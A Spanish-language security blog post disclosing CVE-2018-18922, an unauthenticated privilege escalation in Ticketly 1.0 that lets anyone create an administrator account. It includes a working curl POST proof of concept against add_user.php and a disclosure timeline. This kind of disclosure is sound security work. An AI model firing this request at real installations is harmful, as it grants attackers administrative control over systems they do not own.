CVE-2018-18922 Ticketly 1.0 – Escalación de Privilegios (Crear cuenta administrador)

Javier Olmedo

Hoy, publico otra entrada relacionada con vulnerabilidades en aplicaciones web, esta vez, sobre un software de ticketing llamado Ticketly 1.0 desarrollado por AbiSoft. La vulnerabilidad encontrada, permite a un atacante crearse una cuenta de administrador en el sistema mediante una vulnerabilidad de Escalación de Privilegios, la vulnerabilidad ha sido asociada al CVE-2018-18922.

 

Ticketly – CVE-2018-18922

Ticketly 1.0 – Privilege Escalation (Add Admin Account)

Ticketly 1.0, es un software de ticketing desarrollado por AbiSoft para ofrecer soporte a los usuarios sobre incidencias en los sistemas, está basado en PHP y MySQL.

📅 Vulnerabilidad descubierta por Javier Olmedo el 24/07/2018

💣 Publicada el 05/11/2018

🐛 CVE-2018-18922

🔗 Link del software Ticketly

🐞 Versión vulnerable = 1.0

 

Vector de ataque / Criticidad de la explotación

CRITICIDAD – CRÍTICA

A través de las vulnerabilidades de Escalación de Privilegios, un atacante podría obtener acceso a recursos o funciones de la aplicación de los que, normalmente, no le estaría permitido. Esto, generalmente es causado por una falla en la aplicación al comprobar los privilegios del usuario que realiza la acción o una mala configuración por parte del desarrollador/administrador sobre los privilegios previstos a los usuarios.

 

Parámetro/Recurso vulnerable

El recurso /ticketly/action/add_user.php no realiza una correcta validación de privilegios y permite a un atacante crear una cuenta de administrador sin necesidad de estar autenticado en la aplicación.

 

Puede explotarse con la siguiente petición curl:

💉 curl -i -s -k -X $’POST’ \
-H $’Host: localhost’ -H $’Content-Type: application/x-www-form-urlencoded; charset=UTF-8′ -H $’Content-Length: 82′ \
–data-binary $’name=Javier&lastname=Olmedo&email=contacto@hackpuntes.com&status=1&password=qwerty’ \
$’http://localhost/ticketly/action/add_user.php’

 

Prueba de concepto (PoC)

Timeline

24/07/2018 Descubrimiento de la vulnerabilidad

24/07/2018 Contacto con el desarrollador

24/07/2018 El desarrollador marca la vulnerabiliad como pendiente de parcheo

02/11/2018 Solicito CVE

04/11/2018 Asignación de CVE-2018-18922 por MITRE

05/11/2018 Hago pública la vulnerabilidad

 

Referencias

CVE-MITRE – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18922

 

Un saludo a todos!! 👋

Comparte el artículo si te ha gustado

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on pinterest
Pinterest
Share on telegram
Telegram
Share on whatsapp
WhatsApp
Share on email
Email

Deja tu comentario